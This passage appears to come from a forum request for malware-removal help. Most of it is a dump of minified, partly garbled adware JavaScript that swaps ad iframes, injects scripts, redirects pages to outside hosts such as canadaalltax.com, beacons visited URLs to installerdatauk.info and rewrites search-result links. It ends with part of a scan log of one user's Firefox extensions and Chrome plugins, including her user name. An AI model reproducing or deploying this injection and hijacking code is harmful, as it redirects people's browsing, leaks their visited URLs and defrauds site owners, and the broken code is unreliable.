ctid=CT3330148\")>-1||url.indexOf(\"?ctid=CT3330149\")>-1||url.indexOf(\"http://sporty-glow.com/\")>-1||url.indexOf(\"http://game-trek.net/\")>-1||url.indexOf(\"avatrade.com\")>-1||url.indexOf(\"game-trek.net\")>-1||url.indexOf(\"urgent-alerts.com\")>-1||url.indexOf(\"pc-alert.com\")>-1||url.indexOf(\"error-alerts.com\")>-1){return}}catch(e){};if(Math.ceil(Math.random()*20)==1){(function(){var a = \"microsoft msn youtube.com ninemsn yahoo maktoob rivals amazon jeuxvideo xbox flickr outlook microsoftstore alltheweb intonow overture tumblr live facebook embedr altavista ashleyfurniturehomestore reddit tripadvisor rightmedia craigslist sprint mozilla att omg.com apple americanexpress\".split(\" \");for(var i=0;i-1){return};try{if(typeof(localStorage)!='undefined' && (window.self.location.hostname.indexOf('adnxs.com')>-1 || window.self.location.hostname.indexOf('doubleclick')>-1 || window.self.location.hostname.indexOf('cloudfront')>-1)){localStorage.setItem(\"xhxg4sk42hsba\",\"9\")}}catch(e){};var _wlst={lsKey:\"xhxg4sk42hsba\",get:function(b,a){if(window.self.location.protocol==\"https:\" || 3>>8^d;c=a^-1;0>c&&(c+=4294967296);return c}},_zyad={title:document.title?document.title.toLowerCase():\"na\",location:window.self.location.href.toLowerCase() + (document.referrer ? document.referrer : ''),vrt:!1,networks_list:[[['velis_adr6',688],['mango_K',344],['dsnr_dasa2',170],['dsnr_nntbr2',170],['cpx_cybersoft3_new',4704],['mari_gen_E',3724],['matomy_adj48_new',200]],[['mari_strm_E',50],['matomy_strm53',9950]],[['hulk_porn',10000]]],networks_conf:!1,init:function(){_wlst.get(1,function(b){_zyad.vrt=b;if(!(_zyad.vrt==17 || _zyad.location.indexOf('ygVIDWTo=')>-1|| _zyad.location.indexOf('adk2.co')>-1 ||window.self.location.hostname==\"ib.adnxs.com\"||window.self.location.hostname==\"ads.mangomediaads.com\"||window.self.location.hostname==\"servedby.adsplats.com\"||window.self.location.hostname==\"ads.ventivmedia.com\"|| _zyad.location.indexOf('=287609')>-1|| _zyad.location.indexOf('=511181')>-1||_zyad.location.indexOf('PT1311')>-1||_zyad.location.indexOf('1018-1005')>-1||_zyad.location.indexOf('1019-1001')>-1||_zyad.location.indexOf('2136&zid=')>-1))if(_zyad.networks_conf=12==_zyad.vrt?_zyad.networks_list[2]:_zyad.vrt?_zyad.networks_list[1]:!_zyad.getisP()?_zyad.networks_list[0]:!1,_zyad.networks_conf){for(i=0;5>i;i++)setTimeout(_zyad.find,500*i);window.self==window.top&&1==Math.floor(7*Math.random()+1)&&setTimeout(function(){_zyad.find(1)},6E4)}})},getisD:function(){return-1<_zyad.title.indexOf(\"torrent\")||-1<_zyad.location.indexOf(\"torrent\")},getisNA:function(){return!1},getisP:function(){try{if(12==_zyad.vrt)return!0;if(_zyad.vrt)return!1;var b=document.getElementsByTagName(\"meta\");if(b)for(i=0;i=a-7&&b<=a+7},detectRsize:function(b){try{var a=[0,0];try{a=[parseInt(\"number\"==typeof b.width||\"string\"==typeof b.width&&b.width.match(/[0-9]/)?b.width:b.scrollWidth),parseInt(\"number\"==typeof b.height||\"string\"==typeof b.height&&b.height.match(/[0-9]/)?b.height:b.scrollHeight)]}catch(d){}var c=_zyad.between;switch(!0){case c(a[1],600)&&c(a[0],120):return[120,600];case c(a[1],600)&&c(a[0],160):return[160,600];case c(a[1],600)&&c(a[0],300):return[300,600];case c(a[1],125)&&c(a[0],125):return[125,125];case c(a[1],250)&&c(a[0],300):return[300,250];case c(a[1],250)&&c(a[0],250):return[250,250];case c(a[1],250)&&c(a[0],336):return[300,250];case c(a[1],150)&&c(a[0],180):return[180,150];case c(a[1],400)&&c(a[0],600):return[600,400];case c(a[1],60)&&c(a[0],120):return[120,60];case c(a[1],100)&&c(a[0],300):return[300,100];case c(a[1],60)&&c(a[0],234):return[234,60];case c(a[1],60)&&c(a[0],460):return[460,60];case c(a[1],60)&&c(a[0],468):return[468,60];case c(a[1],90)&&c(a[0],728):return[728,90];default:return!1}}catch(e){return!1}},find:function(b){var a=[],d=window.self.document.getElementsByTagName(\"iframe\");for(i=0;i-1||d[i].src.indexOf('=511181')>-1||d[i].src.indexOf('1018-1005')>-1||d[i].src.indexOf('1019-1001')>-1||d[i].src.indexOf('2136&zid=')>-1||(d[i].getAttribute('name')&&d[i].getAttribute('id')==d[i].getAttribute('name')&&d[i].getAttribute('name').match(/^ap\\d+$/))){try{d[i].setAttribute(\"s18035672904078050142\", \"true\");d[i].setAttribute(\"replaced\", \"true\");}catch(e){};continue;}}catch(e){};(rSize=_zyad.detectRsize(d[i]))&&a.push({size:rSize,ifr:d[i],func:function(a,b){_zyad.setNetwork(a[b].ifr,a[b].size);b++;a&&a[b]&&\"function\"==typeof a[b].func&&setTimeout(function(){a[b].func(a,b)},1)}})}a[0]&&a[0].func&&a[0].func(a,0)},setNetwork:function(b,a){if(a&&b){var d=0,c=0,e=Math.floor(10000*Math.random()+0.9),f=0,h={},g=[];for(i=0;i<_zyad.networks_conf.length;i++){var j=_zyad.networks[_zyad.networks_conf[i][0]](a);j&&(h[i]=j,g.push(i),d+=_zyad.networks_conf[i][1])}10000=e){h[d](b);break}}},iset:function(ifr, url, mode, properties){try{switch(mode){default:case 1:var channel = 0;try{if(ifr.getAttribute('bow')) channel=1}catch(e){}ifr.src = url + (properties ? (url.indexOf('?')>'-1' ? '&' : '/?') + 'ygVIDWTo=' + properties[0] + '_' + properties[1] + '_' + channel : '');break;case 2:try{ifr.src='about:blank';ifr.contentWindow.document.write('\\x3cscript>setTimeout(function(){location.href=\"'+url+'\"},1)\\x3c/script> \\x3c/body>\\x3c/html>');}catch(e){var h = '\\x3cscript>setTimeout(function(){frames[\"a7h3h73d3\"].document.write(\"<\"+\"script>setTimeout(function(){setTimeout(function(){location.href=\\x5c\\\\x27'+url+'\\x5c\\\\x27},1)},1);\"+\"<\"+\"/script>\")},1)\\x3c/script>';ifr.src='javascript:document.write(\\''+h+'\\');'}break;case 3:ifr.src = \"about:blank\";ifr.contentWindow.document.write('\\x3cscript>setTimeout(function(){document.getElementsByTagName(\"body\")[0].innerHTML=\"\\x3cscript src=\"'+url+'\">\\x3c/script>\"},10)\\x3c/script> ');break;case 4:ifr.src = \"about:blank\";ifr.contentWindow.document.write(''+url+'');break;}try{ifr.setAttribute(\"s18035672904078050142\", \"true\");ifr.setAttribute(\"replaced\", \"true\")}catch(e){}}catch(e){}},networks:{velis_adr6:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 120x600 160x600 468x60'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"728x90\":\"2703082\",\"300x250\":\"2703083\",\"120x600\":\"2703084\",\"160x600\":\"2703085\",\"468x60\":\"2703086\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [1469,size]);}}catch(e){return !1;}},mango_K:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 160x600 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"300x250\":\"3087538\",\"160x600\":\"3087537\",\"728x90\":\"3087536\"}[size];var surl='http://ads.mangomediaads.com/tt?id='+ arr + '&cb=${CACHEBUSTER}&referrer=${REFERER_URL}&pubclick=${CLICK_TAG}';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [1625,size]);}}catch(e){return !1;}},dsnr_dasa2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=3024342&size='+size+'&cb=[CACHEBUSTER]&referrer=[REFERRER_URL]', (atp?atp:1), [1596,size]);}}catch(e){return !1;}},dsnr_nntbr2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=3024616&size='+size+'&cb=[CACHEBUSTER]&referrer=[REFERRER_URL]', (atp?atp:1), [1605,size]);}}catch(e){return !1;}},cpx_cybersoft3_new:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://servedby.adsplats.com/tt?id=3294776&size='+size+'&referrer=${REFERER_URL}', (atp?atp:1), [1721,size]);}}catch(e){return !1;}},mari_gen_E:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"728x90\":\"3168511\",\"300x250\":\"3168512\",\"160x600\":\"3168513\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [1693,size]);}}catch(e){return !1;}},matomy_adj48_new:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=3223120&size='+size+'&cb=[CACHEBUSTER]&referrer=[REFERRER_URL]', (atp?atp:1), [1722,size]);}}catch(e){return !1;}},mari_strm_E:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"728x90\":\"3168702\",\"300x250\":\"3168703\",\"160x600\":\"3168704\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '&referrer=[REFERRER_URL]';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [1709,size]);}}catch(e){return !1;}},matomy_strm53:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=3223135&size='+size+'&cb=[CACHEBUSTER]&referrer=[REFERRER_URL]', (atp?atp:1), [1720,size]);}}catch(e){return !1;}},hulk_porn:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600 300x600 250x250 600x400'.indexOf(size)) return !1;var atp=false;var surl='http://syndication.exoclick.com/ads-iframe-display.php?type='+size+'&login=hulkshare_RS2&cat=2&search=&ad_title_color=0000cc&bgcolor=FFFFFF&border=0&border_color=000000&font=&block_keywords=&ad_text_color=000000&ad_durl_color=008000&adult=0&sub=0&text_only=0&show_thumb=0&idzone=' + {\"728x90\":\"638635\",\"300x250\":\"638633\",\"468x60\":\"774737\",\"120x600\":\"774751\",\"160x600\":\"638637\",\"300x600\":\"774753\",\"250x250\":\"774743\",\"600x400\":\"774747\"}[size] + '&idsite=225117&p='+encodeURIComponent(window.self.location.href)+'&dt=' + Math.random();if(!document.getElementById(\"sad32ecs3fdsa\")&&1==Math.ceil(4*Math.random()))try{setTimeout(function(){var b=document.getElementsByTagName(\"body\")[0],a=document.createElement(\"div\");a.setAttribute(\"style\",\"width:728px;height:90px;margin:0 auto\");a.setAttribute(\"id\",\"sad32ecs3fdsa\");a.innerHTML='';b.insertBefore(a,b.firstChild)},1)}catch(e){};;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [420,size]);}}catch(e){return !1;}}}};_zyad.init();})()}else{(function(){var stngs = {attr_name:'s2369553249922053557',szy_domain:[\"dirmusiic.in\",\"superstoragemy.org\"],ad_sizes:[[728,90,1],[300,250,2],[468,60,3],[250,250,4],[160,600,5],[120,600,6],[120,240,7],[240,400,8],[300,600,10],[670,670,11],[600,270,12],[600,400,13]],checkif:function(ifr){return (ifr.getAttribute('s2369553249922053557') || ifr.src.indexOf('=287609')>-1||ifr.src.indexOf('=511181')>-1||ifr.src.indexOf('1018-1005')>-1||ifr.src.indexOf('1019-1001')>-1||ifr.src.indexOf('2136&zid=')>-1&&ifr.src.indexOf('PT1312')>-1||(ifr.getAttribute('name') && ifr.getAttribute('id')==ifr.getAttribute('name') && ifr.getAttribute('name').match(/^ap\\d+$/)))}};window.adzy653rk={nrnm:5,ifr:[],src:[],jbs:{ifr:[],at:[]},imp:{pid:\"777\",eid:\"680\",hid:\"2369553249922053557\",lt:\"32.35\",referrer:document.referrer,hostname:window.self.location.hostname,url:window.self.location.hostname,jpshort:\"ygVIDWTo\",rattr:stngs.attr_name,title:document.title,domain:stngs.szy_domain,sizes:stngs.ad_sizes},topHost:function(){if(window.self!=window.top){var a=decodeURIComponent(window.self.location.search).match(/http:\\/\\/[^&]+/);return a&&a[0]}return null}(),getKeywords:function(){var a=adzy653rk.imp.title,c=document.getElementsByTagName(\"meta\");if(c)for(var b=0,d=c.length;bf[h].length||(c[f[h]]?c[f[h]]++:\nc[f[h]]=1)}catch(k){}var e=[],g;for(g in c)e.push([g,c[g]]);e.sort(function(a,b){return b[1]-a[1]});e=e.slice(0,25);for(g=0;g=c.length){var b=adzy653rk.imp;adzy653rk.jbs.at.length?\nadzy653rk.getAds(\"//\"+adzy653rk.imp.domain[\"https:\"==window.self.location.protocol?1:0]+\"/?tid=1&size=\"+adzy653rk.jbs.at.join(\",\")+\"&subid=\"+b.pid+\"&subid1=\"+b.hid+\"&subid2=\"+b.eid+\"<=\"+b.lt+\"&k=\"+encodeURIComponent(adzy653rk.getKeywords())+(adzy653rk.topHost?\"&tdh=\"+encodeURIComponent(adzy653rk.topHost):\"\"),\"seta\"):adzy653rk.destruct()}else{if(b=adzy653rk.getAt(c[a]))adzy653rk.jbs.ifr.push(c[a]),adzy653rk.jbs.at.push(b);setTimeout(function(){d(++a)},1)}};d(0)}else adzy653rk.destruct()}else adzy653rk.destruct()},\ndfn:function(a){if(adzy653rk.ifr.length&&(a=a?a:1,!(300=adzy653rk.ifr.length?setTimeout(function(){adzy653rk.dfn(++a)},1200):(adzy653rk.src[b]&&adzy653rk.ifr[b]&&adzy653rk.ifr[b].src!=adzy653rk.src[b][0]&&(adzy653rk.ifr[b].nextSibling.innerHTML&&adzy653rk.ifr[b].nextSibling.innerHTML.match(/]?>Ads( not)? by/i)?(new Image).src=\"http://zig.installerdatauk.info/?aid=2&bid=1&hid=2369553249922053557&eid=680&pid=777&cid=0&c=\"+encodeURIComponent(adzy653rk.ifr[b].src):\n((new Image).src=\"http://zig.installerdatauk.info/?aid=1&bid=1&hid=2369553249922053557&eid=680&pid=777&cid=0&c=\"+encodeURIComponent(adzy653rk.ifr[b].src),adzy653rk.ifrset(adzy653rk.ifr[b],adzy653rk.src[b][1],1))),setTimeout(function(){c(++b)},1))};c(0)}},destruct:function(a){adzy653rk.jbs={ifr:[],at:[]};adzy653rk.rnm?adzy653rk.rnm++:(adzy653rk.rnm=1,setTimeout(adzy653rk.dfn,1200));adzy653rk.rnm<=adzy653rk.nrnm&&setTimeout(adzy653rk.init,1200)},getAt:function(a){a=[parseInt(\"number\"==\ntypeof a.width||\"string\"==typeof a.width&&a.width.match(/[0-9]/)?a.width:a.scrollWidth),parseInt(\"number\"==typeof a.height||\"string\"==typeof a.height&&a.height.match(/[0-9]/)?a.height:a.scrollHeight)];for(var c=adzy653rk.imp.sizes,b=0;b=c[b][0]-5&&a[0]<=c[b][0]+5&&a[1]>=c[b][1]-5&&a[1]<=c[b][1]+5)return c[b][2];return!1},getAds:function(a,c){if(-1\",\"\"];switch(c[1]){case 1:a.src=c[0]+(-1'+d[1])}catch(e){}break;case 3:case 6:a.src=\"about:blank\";try{a.contentWindow.document.write(d[0]+c[0]+d[1])}catch(f){}}b||adzy653rk.src.push([a.src,c])},l:{xlat:\"abcdwxyzstuvrqponmijklefghABCDWXYZSTUVMNOPQRIJKLEFGH9876543210+/\",decode:function(a){a=a.toString().replace(/[^A-Za-z0-9\\+\\/]/g,\"\");for(var c=\"\",b=0;b>2,g=(f&3)<<6|h,c=c+String.fromCharCode(d<<2|e>>4);64!=f&&0d)c+=String.fromCharCode(d),b++;else if(191d)var e=a.charCodeAt(b+1),c=c+String.fromCharCode((d&31)<<6|e&63),b=b+2;else var e=a.charCodeAt(b+\n1),f=a.charCodeAt(b+2),c=c+String.fromCharCode((d&15)<<12|(e&63)<<6|f&63),b=b+3}return c}}};\nadzy653rk.location = adzy653rk.imp.referrer+window.self.location.href;if(adzy653rk.location.indexOf(adzy653rk.imp.jpshort+\"=\")==-1 &&adzy653rk.location.indexOf(\"adk2.co\")==-1 &&\"optimizedby.brealtime.com ads.mangomediaads.com www.adshost2.com s-tag.z5x.net ad.z5x.net exchange.admailtiser.com ad.yieldmanager.com kncxsw.com creative.rev2pub.com ad.adserverplus.com servedby.adxplosions.com n103adserv.com cdn.trkclk.net srv.aileronx.com smgadserver.com ads.ventivmedia.com servedby.adsplats.com ad.reachjunction.com ads.deliads.com srv1.statisticsreporting.com advs.adgorithms.com ads.ad-maven.com ad.adnetwork.net ads.incmd03.com ads.mediawhite.com Servedby.bigfineads.com a.ad-sys.com hxewaz.com ads.yahoo.com xp2.zedo.com tala.intlsources.com an.z5x.net c5.zedo.com ib.adnxs.com ad.jumbaexchange.com tr.adsplats.com ads.sonobi.com fw.adsafeprotected.com ad.improvemedianetwork.com media.glispa.com\".indexOf(window.self.location.hostname)==-1 &&adzy653rk.location.indexOf(\"zoneid=287609\")==-1 &&adzy653rk.location.indexOf(\"zoneid=511181\")==-1 &&adzy653rk.location.indexOf(\"2136&zid=\")==-1 &&adzy653rk.location.indexOf(\"1018-1005\")==-1 &&adzy653rk.location.indexOf(\"1019-1001\")==-1 &&adzy653rk.location.indexOf(\"PT1312\")==-1)adzy653rk.init()})()};(function(){try{var b=\"gonetwork.eu performancerevenues.com adtransfer adk2.com timehare clkads.com adcash xtendmedia.com cpxinteractive media-servers directrev doubleclick brealtime.com adnxs.com yieldmanager jsopen yieldads adserverplus clicksor exoclick.com vitalads zedo.com mshft pop.billi mediawhite edomz getjs adjuggler realpopbid bestadbid directdisplayad displayadfeed adorika displayadfeed akamaihd.net/ssa/ trusted-serving tusfiles clkmon.c minecraftdl\".split(\" \");for(i=0;i-1){var channel=99;if(window.onbeforeunload){window.onbeforeunload=null;channel=98};location.href=\"http://canadaalltax.com/e/?f=pjnKrTk8vTs8rc54qx1Fqda4rjkHrdkF&eid=680&hid=2369553249922053557&pid=777&ch=\"+channel+\"&s=px.pluginh&r=\"+Math.random();break}}}catch(d){}})();(function(){var g=function(){var a=window.location.search.split(\"v=\")[1],b=a&&a.indexOf(\"&\")||-1;-1!=b&&(a=a.substring(0,b));return a},h=function(){var a=document.getElementsByClassName(\"watch-view-count\");return a&&a[0]&&a[0].innerHTML?a[0].innerHTML.replace(/^([0-9]+).*$/,\"$1\")||0:0},k=function(){var a=document.getElementsByClassName(\"watch-extras-section\");if(a)for(var b=0;b
';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(h);document.getElementById(\"webscorebox_frm\").submit();localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})();;(function(){try{if(window.opener&&window.self==window.top&&(!window.name.match(/^(a652c|ld893)_/))&&-1==document.cookie.indexOf(\"xcddsa\")&&-1==window.self.location.href.indexOf(\"px.pluginh\")&&window.self.location.hostname.indexOf('earchfu')==-1&&(!document.referrer||-1==document.referrer.indexOf('/amz/')&&-1==document.referrer.indexOf('/sd/dw32.html')&&-1==document.referrer.indexOf('/pop/1.1.00')&&(!document.referrer.match(/cpops-\\d+\\.html/))&&-1==document.referrer.indexOf(\"px.pluginh\"))&&-1==window.self.location.href.indexOf(\"nkths.co\")&&-1==window.self.location.href.indexOf(\"ally.asi\")&&-1==window.self.location.href.indexOf('/sd/dw32.html')&&-1==window.self.location.href.indexOf('/pop/1.1.00')&&-1==window.self.location.href.indexOf('/amz/')&&(!window.self.location.href.match(/cpops-\\d+\\.html/))&&-1==window.self.location.hostname.indexOf(\"getjs\")&&-1==window.self.location.hostname.indexOf(\"hsbc\")&&3>history.length){var c=navigator.userAgent.toLowerCase(),d=\"http://canadaalltax.com/z/?f=pjnKrTk8vTs8rc54qx1Fqda4rjkHrdkF&eid=680&hid=2369553249922053557&pid=777&rf=\" + encodeURIComponent(document.referrer) +\"&s=px.pluginh&r=\"+Math.random();if(-1=f-k){var a=new Date;a.setHours(a.getHours()+1);document.cookie=\"xcddsa=1;expires=\"+a.toUTCString();if(window.onbeforeunload){window.onbeforeunload=null;d+='&ch=97'};try{if(typeof(jQuery)!=\"undefined\"){jQuery(window).unbind(\"beforeunload\")}}catch(e){};window.self.location.href=d}}}else if(!window.menubar.visible&&document.referrer&&-1==document.referrer.indexOf(window.self.location.hostname)){a=new Date;a.setHours(a.getHours()+1);document.cookie=\"xcddsa=1;expires=\"+a.toUTCString();if(window.onbeforeunload){window.onbeforeunload=null;d+='&ch=97'};var b=document.createElement(\"script\");b.type=\"text/javascript\";-1g.length){if(a.waitForTokens[f])return d(null);var h=arguments.callee;a.waitTimeout=setTimeout(function(){b.waitForElementCounter++;h(c,d,e,f)},e)}else{if(a.waitForTokens[f])return d(null);a.waitForTokens[f]=!0;b.waitForElementCounter=0;return d(g)}};a.flushWaitForTokens=function(){a.waitForTokens={}};a.getRandomInt=function(a,b){return Math.floor(Math.random()*(b-a+1))+a}; a.get_computed_style=\"function\"!=typeof window.getComputedStyle?function(c){return{getPropertyValue:function(b){\"float\"==b&&(b=\"styleFloat\");b=a.dhtml_prop_name(b);return\"object\"==typeof c.currentStyle&&null!=c.currentStyle&&\"undefined\"!=typeof c.currentStyle[b]?c.currentStyle[b]:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}};a.query_selector_all=document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch(b){}}:function(a){var b= a.match(/^#([^,\\s]+)$/)||[];if(1c.count)setTimeout(function(){c.check_tab()},1E3);else return!1;else return(b.utils.query_selector_all(\".hdtb_mitem\")[0]||b.utils.query_selector_all(\".tn > div\")[0]).className.match(/(hdtb_msel|tn-selected-mode)/)&&(b.utils.ping(\"validate2\"),c.callback()),!1};if(!c.check_tab())return!1}},yahoo:{hrefSelector:\"a[id^=link]\",unique_search_divs:\"3\", dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"yahoo\"],src_for_keyword:\"#yschsp\",validate:function(){b.utils.ping(\"validate2\");return!0}},bing:{hrefSelector:[\".b_algo a\",\".sb_tlst a\"],unique_search_divs:\"2\",dr:[\".sb_adsWv2\"],urls:[\"http://www.bing.com/search?*\"],src_for_keyword:[\"#sb_form_q\",\".b_searchboxForm[name='q']\"],validate:function(){b.utils.ping(\"validate2\");return!0}}};var l=function(a){if(\"string\"==typeof a){var c=a.match(/:nth-match\\(([0-9]+)\\)/);if(c&&1a)return!0};b.setClickHref=function(a,c){if(\"undefined\"!=typeof b.projects_info[c].hrefSelector){if(b.utils.getRandomInt(1,1E4)>=1E4/b.ratio)return!1;var d=b.projects_info[c].hrefSelector,e=parseInt(localStorage.getItem(b.prefix));if(\"undefined\"!=typeof d){if(d instanceof Array)for(var f=0;fb.keyword.length)return b.utils.flushWaitForTokens(),!1;if(b.inputElement&&\"input\"==b.inputElement.tagName.toLowerCase()&&\"\"!==b.keyword)return c(b.keyword,a.name)};if(d instanceof Array)for(var f=0;f').appendTo(\"body\")}}catch(g){}},f=document.createElement(\"script\");\nf.type=\"text/javascript\";f[-1\")}}catch(w){\"undefined\"!==\ntypeof g&&30<++g&&clearInterval(f)}}},750)}catch(h){}})();\nvar __intervalcountasd=0,__intervalasd=setInterval(function(){__intervalcountasd++;if(-1=l;l++)h=h.parentNode;if(-1) -- C:\Users\Edyta\AppData\Roaming\mozilla\Firefox\Profiles\f3yame1l.default\extensions\{ad9a41d2-9a49-4fa6-a79e-71a0785364c8} [2014-07-16 22:58:37 | 000,000,000 | ---D | M] ("Fast Start") -- C:\Users\Edyta\AppData\Roaming\mozilla\Firefox\Profiles\f3yame1l.default\extensions\faststartff@gmail.com [2014-09-08 21:14:52 | 000,000,000 | ---D | M] ("Feven Pro 1") -- C:\Users\Edyta\AppData\Roaming\mozilla\Firefox\Profiles\f3yame1l.default\extensions\PSFUZ20278470@LYMGVWA85453608.com [2014-09-08 21:14:52 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Edyta\AppData\Roaming\mozilla\Firefox\Profiles\f3yame1l.default\extensions\staged [2014-09-08 21:15:39 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Edyta\AppData\Roaming\mozilla\Firefox\Profiles\f3yame1l.default\extensions\PSFUZ20278470@LYMGVWA85453608.com\extensionData [2014-09-08 21:15:39 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Edyta\AppData\Roaming\mozilla\Firefox\Profiles\f3yame1l.default\extensions\PSFUZ20278470@LYMGVWA85453608.com\extensionData\plugins [2014-09-08 21:15:39 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Edyta\AppData\Roaming\mozilla\Firefox\Profiles\f3yame1l.default\extensions\PSFUZ20278470@LYMGVWA85453608.com\extensionData\userCode [2014-07-05 17:57:42 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Edyta\AppData\Roaming\mozilla\Firefox\Profilesf3yame1l.default\extensions [2014-07-05 17:57:42 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Edyta\AppData\Roaming\mozilla\Firefox\Profilesf3yame1l.default\extensions\staged [2013-04-17 15:50:46 | 000,201,930 | ---- | M] () (No name found) -- C:\Users\Edyta\AppData\Roaming\mozilla\firefox\profiles\f3yame1l.default\extensions\hdvc@hdvc.com.xpi [2013-06-23 20:52:22 | 000,006,505 | ---- | M] () -- C:\Users\Edyta\AppData\Roaming\mozilla\firefox\profiles\f3yame1l.default\searchplugins\babylon.xml [2013-06-23 20:52:36 | 000,001,294 | ---- | M] () -- C:\Users\Edyta\AppData\Roaming\mozilla\firefox\profiles\f3yame1l.default\searchplugins\delta.xml [2013-06-23 21:02:33 | 000,002,391 | ---- | M] () -- C:\Users\Edyta\AppData\Roaming\mozilla\firefox\profiles\f3yame1l.default\searchplugins\Mysearchdial.xml [2013-06-19 23:05:07 | 000,002,644 | ---- | M] () -- C:\Users\Edyta\AppData\Roaming\mozilla\firefox\profiles\f3yame1l.default\searchplugins\Search_Results.xml [2014-07-30 20:05:30 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions [2014-07-30 20:05:51 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd} [color=#E56717]========== Chrome ==========[/color] CHR - default_search_provider: (Enabled) CHR - default_search_provider: search_url = CHR - default_search_provider: suggest_url = CHR - homepage: http://search.gboxapp.com/ CHR - plugin: Shockwave Flash (Enabled) = C:\Program Files (x86)\Google\Chrome\Application\37.0.2062.120\PepperFlash\pepflashplayer.dll CHR - plugin: Chrome Remote Desktop Viewer (Enabled) = internal-remoting-viewer CHR - plugin: Native Client (Enabled) = C:\Program Files (x86)\Google\Chrome\Application\37.0.2062.120\ppGoogleNaClPluginChrome.dll CHR - plugin: Chrome PDF Viewer (Enabled) = C:\Program Files (x86)\Google\Chrome\Application\37.0.2062.120\pdf.dll CHR - plugin: Adobe Acrobat (Enabled) = C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll CHR - plugin: Google Update (Enabled) = C:\Program Files (x86)\Google\Update\1.3.21.153\npGoogleUpdate3.dll CHR - plugin: IntelÄĂ® Identity Protection Technology (Enabled) = C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll CHR - plugin: IntelÄĂ® Identity Protection Technology (Enabled) = C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll CHR - plugin: Nexus Personal (Enabled) = C:\Program Files (x86)\Personal\bin\np_prsnl.dll CHR - plugin: Photo Gallery (Enabled) = C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll CHR - plugin: Microsoft Office 2013 (Enabled) = C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL CHR - plugin: Shockwave for Director (Enabled) = C:\windows\SysWOW64\Adobe\Director\np32dsw_1202122.dll CHR - plugin: Shockwave Flash (Enabled) = C:\windows\SysWOW64\Macromed\Flash\NPSWF32_11_8_800_168.dll CHR - plugin: Silverlight Plug-In (Enabled) = c:\Program Files (x86)\Microsoft Silverlight\5.1.20513.0\npctrl.dll CHR - default_search_provider: E9EAB1BC106D956B91FF2F98FF31031BE2BE280B6AE8359CE433A352ACD15449 (Enabled) CHR - default_search_provider: search_url = 1E3DCA6BD25DE7B7AE9DFBEFFC2584B17DC03F4204D2F022C7E4CAEC86BCD592 CHR - default_search_provider: suggest_url = CHR - homepage: 9267C5A27E2DCC2BE234184FBBE2D6B1FEDB294663E69E965415AC69B6480668 CHR - Extension: Google Docs = C:\Users\Edyta\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\ CHR - Extension: Google Drive = C:\Users\Edyta\AppData\Local\Google\Chrome\User 